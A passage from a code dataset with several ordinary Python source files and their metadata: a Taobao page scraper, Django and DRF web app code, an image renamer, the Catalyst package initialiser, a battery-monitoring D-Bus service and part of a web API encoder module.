% i\n # 让浏览器滚动,加载数据\n for x in range(1, 11, 2):\n # 暂停1秒再开始滚动\n time.sleep(0.5)\n j = x / 10.0\n # %f float小数类型的占位符\n js = 'document.documentElement.scrollTop = document.documentElement.scrollHeight * %f' % j\n # 执行js代码\n driver.execute_script(js)\n\n # 浏览器滚动结束之后,取出数据\n # 找到所有的class名称为info-cont的标签\n shops = driver.find_elements_by_class_name('info-cont')\n # for循环遍历列表,取出每一个商品信息\n for shop in shops:\n # 写入数据 编码\n file_handle.write(shop.text.encode('utf-8'))\n # 写入换行符\n # file_handle.write('\\n\\n')\n\n # 查找下一页\n next_page = driver.find_element_by_link_text('下一页')\n next_page.click()\n\n# 关闭文件\nfile_handle.close()\n","repo_name":"baozha2003/test_project","sub_path":"venv/foo/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5093809002","text":"# -*- coding: utf-8 -*-\n__author__ = 129\n__date__ = 2017 / 11 / 2\n\nimport urllib.request\n\n\ndef http_get(url):\n resp = urllib.request.urlopen(url)\n print('status code:\\t', resp.getcode())\n print('status message:\\t', resp.msg)\n print('page header:\\t', resp.headers)\n print('page content:\\t', resp.read())\n print('content:\\t',resp.read())\n\n\ndef http_post(url, data):\n resp = urllib.request.urlopen(url=url, data=data)\n\nif __name__ == '__main__':\n http_get('http://item.jd.com/5811182.html')","repo_name":"chafingdisher/web_api_py","sub_path":"com/wpsd/util/httputil.py","file_name":"httputil.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19660686200","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework import generics, filters, status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import Transformer\nfrom .serializers import TransformerSerializer\nfrom .signals import new_item_created\nfrom rest_framework import generics\nfrom django.db.models import Q\nfrom .models import Transformer\nfrom .serializers import TransformerSerializer\nimport pandas as pd\nfrom django.conf import settings\nfrom . 
import signals\n\nclass TransformerRetrieveUpdateDestroyView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Transformer.objects.all()\n serializer_class = TransformerSerializer\n\n\nclass TransformerListView(generics.ListCreateAPIView):\n serializer_class = TransformerSerializer\n def perform_create(self, serializer):\n instance = serializer.save()\n new_item_created.send(sender=instance.__class__, instance=instance)\n def get_queryset(self):\n # Get latitude and longitude query parameters from the request\n sensor_dataset = pd.read_csv(settings.SENSOR_FILE)\n latitude = self.request.query_params.get('latitude')\n longitude = self.request.query_params.get('longitude')\n if latitude is not None and longitude is not None:\n try:\n latitude = float(latitude)\n longitude = float(longitude)\n except ValueError:\n return Transformer.objects.none()\n\n # Define latitude and longitude difference (approximately 2 units)\n latitude_difference = 2\n longitude_difference = 2\n\n # Calculate latitude and longitude ranges for the query\n min_latitude = latitude - latitude_difference\n max_latitude = latitude + latitude_difference\n min_longitude = longitude - longitude_difference\n max_longitude = longitude + longitude_difference\n #random\n\n # Query Transformer instances within the specified range\n queryset = Transformer.objects.filter(\n Q(latitude__gte=min_latitude) &\n Q(latitude__lte=max_latitude) &\n Q(longitude__gte=min_longitude) &\n Q(longitude__lte=max_longitude)\n )\n return_queryset = queryset\n else:\n return_queryset = Transformer.objects.all()\n for transformer in return_queryset:\n sensor_data = sensor_dataset.sample(1)\n predicted_value = signals.model.predict(sensor_data)\n if predicted_value ==1:\n transformer.fault = True\n transformer.save()\n \n for transformer in return_queryset:\n if transformer.fault == False:\n transformer.fault = 0\n if transformer.fault == True:\n transformer.fault = 1\n return return_queryset\n\n\n@api_view(['GET'])\ndef model_predict(request):\n\n predicted_result = \"\"\n return Response(predicted_result)\n ","repo_name":"NebulaAnish/Grid-Guardian","sub_path":"backend/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43466096661","text":"import logging\nimport os\nimport sys\n\nfrom model.image_entry import ImageEntry\n\n\ndef renamer_service(controller) -> None:\n folder_path = controller.args.get_image_folder_path()\n updated_images = {}\n\n for date_number, image_entry in controller.selected_images.items():\n file_extension = os.path.splitext(image_entry.file_name)[-1].lower()\n if file_extension == \".jpeg\":\n file_extension = \".jpg\"\n new_file_name = (\n f\"OneShot_{image_entry.date_time.strftime('%Y%m%d%H%M%S')}{file_extension}\"\n )\n\n if image_entry.file_name != new_file_name:\n try:\n os.rename(\n f\"{folder_path}/{image_entry.file_name}\",\n f\"{folder_path}/{new_file_name}\",\n )\n updated_images[date_number] = ImageEntry(\n new_file_name,\n image_entry.date_time,\n image_entry.date_time_read_from,\n )\n logging.info(f\"Renamed '{image_entry.file_name}' to '{new_file_name}'\")\n except OSError as e:\n logging.error(f\"Failed to rename {image_entry.file_name}: {e}\")\n sys.exit(1)\n\n controller.selected_images.update(updated_images)\n 
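# --- Editor's note (added by the editor, not part of the original file) ---
# TransformerListView.get_queryset above filters with a fixed +/- 2 degree
# bounding box around the requested point; the four Q objects AND together
# into a single WHERE clause, roughly:
#
#     WHERE latitude  BETWEEN lat - 2 AND lat + 2
#       AND longitude BETWEEN lon - 2 AND lon + 2
#
# Degrees of longitude shrink toward the poles, so this box is not a fixed
# ground distance; a geodesic lookup (e.g. GeoDjango's dwithin) would be
# needed for a true radius query.
# --- end editor's note ---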
+{"seq_id":"43466096661","text":"import logging\nimport os\nimport sys\n\nfrom model.image_entry import ImageEntry\n\n\ndef renamer_service(controller) -> None:\n    folder_path = controller.args.get_image_folder_path()\n    updated_images = {}\n\n    for date_number, image_entry in controller.selected_images.items():\n        file_extension = os.path.splitext(image_entry.file_name)[-1].lower()\n        if file_extension == \".jpeg\":\n            file_extension = \".jpg\"\n        new_file_name = (\n            f\"OneShot_{image_entry.date_time.strftime('%Y%m%d%H%M%S')}{file_extension}\"\n        )\n\n        if image_entry.file_name != new_file_name:\n            try:\n                os.rename(\n                    f\"{folder_path}/{image_entry.file_name}\",\n                    f\"{folder_path}/{new_file_name}\",\n                )\n                updated_images[date_number] = ImageEntry(\n                    new_file_name,\n                    image_entry.date_time,\n                    image_entry.date_time_read_from,\n                )\n                logging.info(f\"Renamed '{image_entry.file_name}' to '{new_file_name}'\")\n            except OSError as e:\n                logging.error(f\"Failed to rename {image_entry.file_name}: {e}\")\n                sys.exit(1)\n\n    controller.selected_images.update(updated_images)\n    controller.set_event(\"rename_finished\")\n","repo_name":"ptrLx/oneshot-import","sub_path":"src/service/renamer.py","file_name":"renamer.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
+{"seq_id":"24817693186","text":"import itertools\nfrom collections import Counter\nfrom lib import kuzuha, regex, normalize\nfrom lib.nlp import ngram, mecab\n\n\ndef get_longest_common_substring(logs):\n    ngramer = ngram.Ngramer()\n    ngrams = ngramer.to_ngrams(logs, 25, 9)\n    ngrams = itertools.chain.from_iterable(ngrams)\n    ngram_counter = Counter(ngrams)\n\n    if not ngram_counter:\n        return []\n\n    messages = []\n    prev_count = 0\n    for (message, count) in ngram_counter.most_common(1000):\n        if count < prev_count:\n            break\n        messages.append(message)\n        prev_count = count\n    return sorted(messages, key=len, reverse=True)\n\n\ndef cleansing(text):\n    text = text.strip()\n    text = text.replace('\\n', '')\n    text = regex.re_a_tag.sub('', text)\n    text = normalize.remove_emoticon(text)\n    return normalize.normalize(text, repeat=3)\n\n\ndef respond(text, *args):\n    logs = kuzuha.search(mecab.extract_word(text))\n    logs = [cleansing(log.get('text', '')) for log in logs]\n    for message in get_longest_common_substring(''.join(logs)):\n        if message:\n            yield message + '(;´Д`)'\n","repo_name":"kuhaku/atango","sub_path":"lib/dialogue/common_substr.py","file_name":"common_substr.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"}
+{"seq_id":"27790713548","text":"from rest_framework import serializers\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth import authenticate\n\nfrom .models import User, Item, OrderItems, Order\n\nclass StringSerializer(serializers.StringRelatedField):\n    def to_internal_value(self, value):\n        return value\n\n\nclass RegisterSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = User\n        fields = (\n            'id',\n            'username',\n            'email',\n            'password',\n            'bio'\n        )\n        extra_kwargs = {'password': {'write_only': True}}\n    def create(self, validated_data):\n        user = User.objects.create_user(username=validated_data['username'], email=validated_data['email'], password=validated_data['password'])\n        user.bio = validated_data['bio']\n        user.is_staff = True\n        user.save()\n        return user\n\nclass LoginSerializer(serializers.Serializer):\n    username = serializers.CharField()\n    password = serializers.CharField()\n\n    def validate(self, data):\n        user = authenticate(**data)\n        if user and user.is_active:\n            return user\n        # raise (not return) the error so DRF reports a validation failure\n        raise serializers.ValidationError(\"Incorrect credentials\")\nclass UserSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = User\n        fields = ('id', 'username', 'email',\n                  'bio')\n\nclass ItemSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Item\n        fields = (\n            'id',\n            'price',\n            'description',\n            'pic',\n            'discount_price',\n            'slug',\n            'category',\n            'label'\n        )\n\nclass OrderItemsSerializer(serializers.ModelSerializer):\n    item_obj = serializers.SerializerMethodField()\n    final_price = serializers.SerializerMethodField()\n    item = StringSerializer()\n    class Meta:\n        model = OrderItems\n        fields = (\n            'id',\n            'item',\n            'item_obj',\n            'ordered',\n            'final_price',\n            'quantity'\n        )\n    def get_item_obj(self, obj):\n        return ItemSerializer(obj.item).data\n    def 
get_final_price(self,obj):\n return obj.get_final_price()\n\nclass OrderSerializer(serializers.ModelSerializer):\n orderItems = serializers.SerializerMethodField()\n total = serializers.SerializerMethodField()\n \n class Meta:\n model = Order\n fields = (\n 'id',\n 'items',\n 'total',\n 'orderItems'\n )\n def get_orderItems(self,obj):\n return OrderItemsSerializer(obj.items.all(),many=True).data\n def get_total(self,obj):\n return obj.get_total()","repo_name":"manulangat1/django_pos_system_docker_jenkins","sub_path":"backend/pos/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42407127049","text":"import sys\nimport types\n\nimport jaxlib as _jaxlib\n\n_jaxlib_version = \"0.4.14\"\nif _jaxlib.__version__ != _jaxlib_version:\n import warnings\n\n warnings.warn(\n \"Catalyst detected a version mismatch for the installed 'jaxlib' package. Please make sure \"\n \"to install the exact version required by Catalyst to avoid undefined behaviour.\\n\"\n f\"Expected: {_jaxlib_version} Found: {_jaxlib.__version__}\",\n )\n\n\nfrom catalyst._configuration import INSTALLED\nfrom catalyst._version import __version__\n\nif not INSTALLED:\n import os\n\n default_bindings_path = os.path.join(\n os.path.dirname(__file__), \"../../mlir/build/python_packages/quantum\"\n )\n if os.path.exists(default_bindings_path): # pragma: no cover\n sys.path.insert(0, default_bindings_path)\n\n# Patch certain modules to integrate our MLIR bindings with JAX. This needs to happen before any\n# part of 'mlir_quantum' is imported.\n# Note that '__import__' does not return the specific submodule, only the parent package.\n# pylint: disable=protected-access\nsys.modules[\"mlir_quantum.ir\"] = __import__(\"jaxlib.mlir.ir\").mlir.ir\nsys.modules[\"mlir_quantum._mlir_libs\"] = __import__(\"jaxlib.mlir._mlir_libs\").mlir._mlir_libs\n# C++ extensions to the dialects are mocked out.\nsys.modules[\"mlir_quantum._mlir_libs._quantumDialects.gradient\"] = types.ModuleType(\n \"mlir_quantum._mlir_libs._quantumDialects.gradient\"\n)\nsys.modules[\"mlir_quantum._mlir_libs._quantumDialects.quantum\"] = types.ModuleType(\n \"mlir_quantum._mlir_libs._quantumDialects.quantum\"\n)\n\n\nfrom catalyst.ag_utils import AutoGraphError, autograph_source\nfrom catalyst.compilation_pipelines import QJIT, CompileOptions, qjit\nfrom catalyst.pennylane_extensions import (\n adjoint,\n cond,\n ctrl,\n for_loop,\n grad,\n jacobian,\n jvp,\n measure,\n vjp,\n while_loop,\n)\nfrom catalyst.utils.exceptions import CompileError\n\nautograph_ignore_fallbacks = False\n\"\"\"bool: Specify whether AutoGraph should avoid raising\nwarnings when conversion fails and control flow instead falls back\nto being interpreted by Python at compile-time.\n\n**Example**\n\nIn certain cases, AutoGraph will fail to convert control flow (for example,\nwhen an object that can not be converted to a JAX array is indexed in a\nloop), and will raise a warning informing of the failure.\n\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... x = [\"0.1\", \"0.2\", \"0.3\"]\n... for i in range(3):\n... qml.RX(float(x[i]), wires=i)\n... return qml.expval(qml.PauliZ(0))\nWarning: Tracing of an AutoGraph converted for loop failed with an exception:\n...\nIf you intended for the conversion to happen, make sure that the (now dynamic)\nloop variable is not used in tracing-incompatible ways, for instance by indexing a\nPython list with it. 
In that case, the list should be wrapped into an array.\n\nSetting this variable to ``True`` will suppress warning messages:\n\n>>> catalyst.autograph_strict_conversion = False\n>>> catalyst.autograph_ignore_fallbacks = True\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... x = [\"0.1\", \"0.2\", \"0.3\"]\n... for i in range(3):\n... qml.RX(float(x[i]), wires=i)\n... return qml.expval(qml.PauliZ(0))\n>>> f()\narray(0.99500417)\n\"\"\"\n\nautograph_strict_conversion = False\n\"\"\"bool: Specify whether AutoGraph should raise exceptions\nwhen conversion fails, rather than falling back to interpreting\ncontrol flow by Python at compile-time.\n\n**Example**\n\nIn certain cases, AutoGraph will fail to convert control flow (for example,\nwhen an object that cannot be converted to a JAX array is indexed in a\nloop), and will automatically fallback to interpreting the control flow\nlogic at compile-time via Python:\n\n>>> dev = qml.device(\"lightning.qubit\", wires=1)\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... params = [\"0\", \"1\", \"2\"]\n... for x in params:\n... qml.RY(int(x) * jnp.pi / 4, wires=0)\n... return qml.expval(qml.PauliZ(0))\n>>> f()\narray(-0.70710678)\n\nSetting this variable to ``True`` will cause AutoGraph\nto error rather than fallback when conversion fails:\n\n>>> catalyst.autograph_strict_conversion = True\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... params = [\"0\", \"1\", \"2\"]\n... for x in params:\n... qml.RY(int(x) * jnp.pi / 4, wires=0)\n... return qml.expval(qml.PauliZ(0))\nAutoGraphError: Could not convert the iteration target ['0', '1', '2'] to array\nwhile processing the following with AutoGraph:\n File \"\", line 7, in f\n for x in params:\n\"\"\"\n\n\n__all__ = (\n \"qjit\",\n \"QJIT\",\n \"for_loop\",\n \"while_loop\",\n \"cond\",\n \"ctrl\",\n \"measure\",\n \"grad\",\n \"jacobian\",\n \"vjp\",\n \"jvp\",\n \"adjoint\",\n \"autograph_source\",\n \"autograph_ignore_fallbacks\",\n \"autograph_strict_conversion\",\n \"AutoGraphError\",\n \"CompileError\",\n \"CompileOptions\",\n)\n","repo_name":"PennyLaneAI/catalyst","sub_path":"frontend/catalyst/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"34"} +{"seq_id":"36294134334","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nfrom script_utils import SCRIPT_HOME, VERSION\nsys.path.insert(1, os.path.join(os.path.dirname(__file__), f\"{SCRIPT_HOME}/ext\"))\n\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\nfrom gi.repository import GLib\nimport logging\nfrom vedbus import VeDbusService\nfrom dbusmonitor import DbusMonitor\nfrom collections import namedtuple\nimport time\nfrom pathlib import Path\nimport json\n\nDEPTH_OF_DISCHARGE = 50\n\nSTANDARD_TEMPERATURE = 25\nTEMPERATURE_COMPENSATION = -16/1000\n\nDEFAULT_MAX_VOLTAGE = 14.8\nDEFAULT_FULL_VOLTAGE = 12.8\nDEFAULT_MIN_VOLTAGE = 12.2\nDEFAULT_EMPTY_VOLTAGE = 11.8\n\nVOLTAGE_DEADBAND = 1.0\n\nMAX_DATA_HISTORY = 9\n\nDEVICE_INSTANCE_ID = 1025\nPRODUCT_ID = 0\nPRODUCT_NAME = \"Battery Proxy\"\nFIRMWARE_VERSION = 0\nHARDWARE_VERSION = 0\nCONNECTED = 1\n\nBATTERY_TEMPERATURE_SENSOR = 0\n\nFLOAT_STATE = 5\n\nFOREVER = 864000\n\nALARM_OK = 0\nALARM_WARNING = 1\nALARM_ALARM = 2\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(\"battery\")\n\n\nclass SystemBus(dbus.bus.BusConnection):\n def __new__(cls):\n return dbus.bus.BusConnection.__new__(cls, 
dbus.bus.BusConnection.TYPE_SYSTEM)\n\n\nclass SessionBus(dbus.bus.BusConnection):\n def __new__(cls):\n return dbus.bus.BusConnection.__new__(cls, dbus.bus.BusConnection.TYPE_SESSION)\n\n\ndef dbusConnection():\n return SessionBus() if 'DBUS_SESSION_BUS_ADDRESS' in os.environ else SystemBus()\n\n\nService = namedtuple('Service', ['name', 'type'])\nPowerSample = namedtuple('PowerSample', ['power', 'timestamp'])\nDataSample = namedtuple('DataSample', ['current', 'voltage', 'timestamp', 'temperature'])\n\n\ndef _safe_min(newValue, currentValue):\n return min(newValue, currentValue) if currentValue is not None else newValue\n\n\ndef _safe_max(newValue, currentValue):\n return max(newValue, currentValue) if currentValue is not None else newValue\n\n\ndef toKWh(joules):\n return joules/3600/1000\n\n\ndef toAh(joules, voltage):\n return joules/voltage/3600\n\n\nVOLTAGE_TEXT = lambda path,value: \"{:.2f}V\".format(value)\nCURRENT_TEXT = lambda path,value: \"{:.3f}A\".format(value)\nPOWER_TEXT = lambda path,value: \"{:.2f}W\".format(value)\nENERGY_TEXT = lambda path,value: \"{:.6f}kWh\".format(value)\nAH_TEXT = lambda path,value: \"{:.3f}Ah\".format(value)\nSOC_TEXT = lambda path,value: \"{:.0f}%\".format(value)\n\n\ndef compensated_voltage(voltage, temperature):\n return voltage - (temperature - STANDARD_TEMPERATURE) * TEMPERATURE_COMPENSATION\n\n\nclass BatteryService:\n def __init__(self, conn, config):\n self.config = config\n self.emptyVoltage = config.get(\"emptyVoltage\", DEFAULT_EMPTY_VOLTAGE)\n self.minVoltage = config.get(\"minVoltage\", DEFAULT_MIN_VOLTAGE)\n self.fullVoltage = config.get(\"fullVoltage\", DEFAULT_FULL_VOLTAGE)\n self.maxVoltage = config.get(\"maxVoltage\", DEFAULT_MAX_VOLTAGE)\n self.service = VeDbusService('com.victronenergy.battery.proxy', conn)\n self.service.add_mandatory_paths(__file__, VERSION, 'dbus', DEVICE_INSTANCE_ID,\n PRODUCT_ID, PRODUCT_NAME, FIRMWARE_VERSION, HARDWARE_VERSION, CONNECTED)\n self.service.add_path(\"/Dc/0/Voltage\", 0, gettextcallback=VOLTAGE_TEXT)\n self.service.add_path(\"/Dc/0/Current\", 0, gettextcallback=CURRENT_TEXT)\n self.service.add_path(\"/Dc/0/Power\", 0, gettextcallback=POWER_TEXT)\n self.service.add_path(\"/Soc\", None, gettextcallback=SOC_TEXT)\n self.service.add_path(\"/TimeToGo\", FOREVER)\n self.service.add_path(\"/History/MinimumVoltage\", None, gettextcallback=VOLTAGE_TEXT)\n self.service.add_path(\"/History/MaximumVoltage\", None, gettextcallback=VOLTAGE_TEXT)\n self.service.add_path(\"/History/ChargedEnergy\", 0, gettextcallback=ENERGY_TEXT)\n self.service.add_path(\"/History/DischargedEnergy\", 0, gettextcallback=ENERGY_TEXT)\n self.service.add_path(\"/History/TotalAhDrawn\", 0, gettextcallback=AH_TEXT)\n self.service.add_path(\"/History/DeepestDischarge\", None, gettextcallback=SOC_TEXT)\n self.service.add_path(\"/History/FullDischarges\", 0)\n self.service.add_path(\"/Alarms/LowVoltage\", ALARM_OK)\n self.service.add_path(\"/Alarms/HighVoltage\", ALARM_OK)\n self.service.add_path(\"/Alarms/LowSoc\", ALARM_OK)\n self.service.add_path(\"/Capacity\", self.config['capacity'], gettextcallback=AH_TEXT)\n self.service.add_path(\"/InstalledCapacity\", self.config['capacity'], gettextcallback=AH_TEXT)\n self._local_values = {}\n for path in self.service._dbusobjects:\n self._local_values[path] = self.service[path]\n options = None # currently not used afaik\n self.monitor = DbusMonitor({\n 'com.victronenergy.solarcharger': {\n '/Dc/0/Current': options,\n '/Dc/0/Voltage': options,\n '/State': options,\n '/Dc/0/Power': options\n 
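# each monitored service type exposes the current/voltage/power paths consumed by update() below\n            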
},\n 'com.victronenergy.dcload': {\n '/Dc/0/Current': options,\n '/Dc/0/Voltage': options,\n '/Dc/0/Power': options\n },\n 'com.victronenergy.dcsource': {\n '/Dc/0/Current': options,\n '/Dc/0/Voltage': options,\n '/Dc/0/Power': options\n },\n 'com.victronenergy.temperature': {\n '/Temperature': options,\n '/TemperatureType': options\n }\n })\n self.lastPower = None\n self.dataHistory = []\n\n def _get_value(self, serviceName, path, defaultValue=None):\n return self.monitor.get_value(serviceName, path, defaultValue)\n\n def update(self):\n bestLoadVoltage = None\n bestSourceVoltage = None\n totalCurrent = 0\n totalPower = 0\n chargingState = None\n\n services = []\n for serviceType in ['solarcharger', 'dcload', 'dcsource']:\n for serviceName in self.monitor.get_service_list('com.victronenergy.' + serviceType):\n services.append(Service(serviceName, serviceType))\n\n for service in services:\n serviceName = service.name\n current = self._get_value(serviceName, \"/Dc/0/Current\", 0)\n voltage = self._get_value(serviceName, \"/Dc/0/Voltage\", 0)\n power = self._get_value(serviceName, \"/Dc/0/Power\", voltage * current)\n if service.type == 'dcload':\n current = -current\n power = -power\n # highest should be most accurate as closest to battery (upstream cable losses)\n if voltage > VOLTAGE_DEADBAND:\n bestLoadVoltage = _safe_max(voltage, bestLoadVoltage)\n else:\n # lowest should be most accurate as closest to battery (downstream cable losses)\n if voltage > VOLTAGE_DEADBAND:\n bestSourceVoltage = _safe_min(voltage, bestSourceVoltage)\n totalCurrent += current\n totalPower += power\n\n if service.type == 'solarcharger':\n chargingState = self._get_value(serviceName, \"/State\")\n\n temperature = STANDARD_TEMPERATURE\n for serviceName in self.monitor.get_service_list('com.victronenergy.temperature'):\n if self._get_value(serviceName, \"/TemperatureType\") == BATTERY_TEMPERATURE_SENSOR:\n temperature = self._get_value(serviceName, \"/Temperature\", STANDARD_TEMPERATURE)\n break\n\n self._local_values[\"/Dc/0/Current\"] = totalCurrent\n batteryVoltage = None\n if bestLoadVoltage and bestSourceVoltage:\n batteryVoltage = (bestLoadVoltage + bestSourceVoltage)/2\n elif bestLoadVoltage:\n batteryVoltage = bestLoadVoltage\n elif bestSourceVoltage:\n batteryVoltage = bestSourceVoltage\n if batteryVoltage:\n self._local_values[\"/Dc/0/Voltage\"] = round(batteryVoltage, 3)\n\n now = time.perf_counter()\n self._local_values[\"/Dc/0/Power\"] = totalPower\n remainingAh = self._local_values[\"/Capacity\"]\n if self.lastPower is not None:\n # trapezium integration\n energy = (self.lastPower.power + totalPower)/2 * (now - self.lastPower.timestamp)\n if energy > 0:\n chargedEnergy = energy\n self._local_values[\"/History/ChargedEnergy\"] += toKWh(chargedEnergy)\n chargedAh = toAh(chargedEnergy, batteryVoltage)\n remainingAh = min(remainingAh + chargedAh, self.config['capacity'])\n elif energy < 0:\n dischargedEnergy = -energy\n self._local_values[\"/History/DischargedEnergy\"] += toKWh(dischargedEnergy)\n dischargedAh = toAh(dischargedEnergy, batteryVoltage)\n self._local_values[\"/History/TotalAhDrawn\"] += dischargedAh\n remainingAh = max(remainingAh - dischargedAh, 0)\n self.lastPower = PowerSample(totalPower, now)\n\n if chargingState == FLOAT_STATE:\n remainingAh = self.config['capacity']\n self._local_values[\"/Capacity\"] = remainingAh\n\n self.dataHistory.append(DataSample(totalCurrent, batteryVoltage, now, temperature))\n dataHistoryLen = len(self.dataHistory)\n if dataHistoryLen > MAX_DATA_HISTORY:\n 
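# keep only the newest MAX_DATA_HISTORY samples so the median filters below see a bounded window\n            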
del self.dataHistory[:dataHistoryLen-MAX_DATA_HISTORY]\n\n # median current filter\n filteredCurrentSample = sorted(self.dataHistory, key=lambda sample: sample.current)[dataHistoryLen//2]\n filteredCurrent = filteredCurrentSample.current\n # use a filtered value to remove any transients\n if filteredCurrent < 0:\n dischargeCurrent = -filteredCurrent\n self._local_values[\"/TimeToGo\"] = max(round((remainingAh - DEPTH_OF_DISCHARGE/100 * self.config['capacity'])/dischargeCurrent * 3600, 0), 0)\n else:\n self._local_values[\"/TimeToGo\"] = FOREVER\n\n soc = self.soc_from_voltage(compensated_voltage(batteryVoltage, temperature))\n self._local_values[\"/Soc\"] = soc\n if soc < 10:\n self._local_values[\"/Alarms/LowSoc\"] = ALARM_ALARM\n else:\n self._local_values[\"/Alarms/LowSoc\"] = ALARM_OK\n self._local_values[\"/History/MinimumVoltage\"] = _safe_min(batteryVoltage, self._local_values[\"/History/MinimumVoltage\"])\n self._local_values[\"/History/MaximumVoltage\"] = _safe_max(batteryVoltage, self._local_values[\"/History/MaximumVoltage\"])\n deepestDischarge = self._local_values[\"/History/DeepestDischarge\"]\n if deepestDischarge is None or soc < deepestDischarge:\n self._local_values[\"/History/DeepestDischarge\"] = soc\n if batteryVoltage <= self.emptyVoltage:\n self._local_values[\"/History/FullDischarges\"] += 1\n\n # median voltage filter\n filteredVoltageSample = sorted(self.dataHistory, key=lambda sample: sample.voltage)[dataHistoryLen//2]\n filteredCompensatedVoltage = compensated_voltage(filteredVoltageSample.voltage, filteredVoltageSample.temperature)\n # use a filtered value for alarm checking to remove any transients\n if filteredCompensatedVoltage <= self.minVoltage:\n self._local_values[\"/Alarms/LowVoltage\"] = ALARM_ALARM\n else:\n self._local_values[\"/Alarms/LowVoltage\"] = ALARM_OK\n if filteredCompensatedVoltage >= self.maxVoltage:\n self._local_values[\"/Alarms/HighVoltage\"] = ALARM_ALARM\n else:\n self._local_values[\"/Alarms/HighVoltage\"] = ALARM_OK\n return True\n\n def publish(self):\n for k,v in self._local_values.items():\n self.service[k] = v\n return True\n\n def soc_from_voltage(self, voltage):\n # very approximate!!!\n return min(max(100 * (voltage - self.emptyVoltage)/(self.fullVoltage - self.emptyVoltage), 0), 100)\n\n def __str__(self):\n return PRODUCT_NAME\n\n\ndef main():\n DBusGMainLoop(set_as_default=True)\n setupOptions = Path(\"/data/setupOptions/BatteryProxy\")\n configFile = setupOptions/\"config.json\"\n with configFile.open() as f:\n config = json.load(f)\n battery = BatteryService(dbusConnection(), config)\n GLib.timeout_add(200, battery.update)\n GLib.timeout_add_seconds(1, battery.publish)\n logger.info(\"Registered Battery Proxy\")\n mainloop = GLib.MainLoop()\n mainloop.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pulquero/BatteryProxy","sub_path":"battery_service.py","file_name":"battery_service.py","file_ext":"py","file_size_in_byte":12604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16797705752","text":"import io\nimport json\nfrom xml.sax.saxutils import XMLGenerator\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User, Group\nfrom django.db.models.query import QuerySet\n\nfrom djblets.util.serializers import DjbletsJSONEncoder\n\n\nclass WebAPIEncoder(object):\n \"\"\"Encodes an object into a dictionary of fields and values.\n\n This object is used for both JSON and XML API formats.\n\n Projects can subclass this to 
provide representations of their objects.\n To make use of a encoder, add the path to the encoder class to\n the project's ``settings.WEB_API_ENCODERS`` list.\n\n For example:\n\n .. code-block:: python\n\n WEB_API_ENCODERS = (\n 'myproject.webapi.MyEncoder',\n )\n \"\"\"\n\n def encode(self, o, *args, **kwargs):\n \"\"\"Encodes an object.\n\n This is expected to return either a dictionary or a list. If the\n object being encoded is not supported, return None, or call\n the superclass's encode method.\n \"\"\"\n return None\n\n\nclass BasicAPIEncoder(WebAPIEncoder):\n \"\"\"A basic encoder that encodes standard types.\n\n This supports encoding of dates, times, QuerySets, Users, and Groups.\n \"\"\"\n def encode(self, o, *args, **kwargs):\n if isinstance(o, QuerySet):\n return list(o)\n elif isinstance(o, User):\n return {\n 'id': o.id,\n 'username': o.username,\n 'first_name': o.first_name,\n 'last_name': o.last_name,\n 'fullname': o.get_full_name(),\n 'email': o.email,\n 'url': o.get_absolute_url(),\n }\n elif isinstance(o, Group):\n return {\n 'id': o.id,\n 'name': o.name,\n }\n else:\n try:\n return DjbletsJSONEncoder().default(o)\n except TypeError:\n return None\n\n\nclass ResourceAPIEncoder(WebAPIEncoder):\n \"\"\"An encoder that encodes objects based on registered resources.\"\"\"\n def encode(self, o, *args, **kwargs):\n if isinstance(o, QuerySet):\n return list(o)\n else:\n calling_resource = kwargs.pop('calling_resource', None)\n\n if calling_resource:\n serializer = calling_resource.get_serializer_for_object(o)\n else:\n from djblets.webapi.resources import get_resource_for_object\n\n serializer = get_resource_for_object(o)\n\n if serializer:\n return serializer.serialize_object(o, *args, **kwargs)\n else:\n try:\n return DjbletsJSONEncoder().default(o)\n except TypeError:\n return None\n\n\nclass JSONEncoderAdapter(json.JSONEncoder):\n \"\"\"Adapts a WebAPIEncoder to be used with json.\n\n This takes an existing encoder and makes it available to use as a\n json.JSONEncoder. 
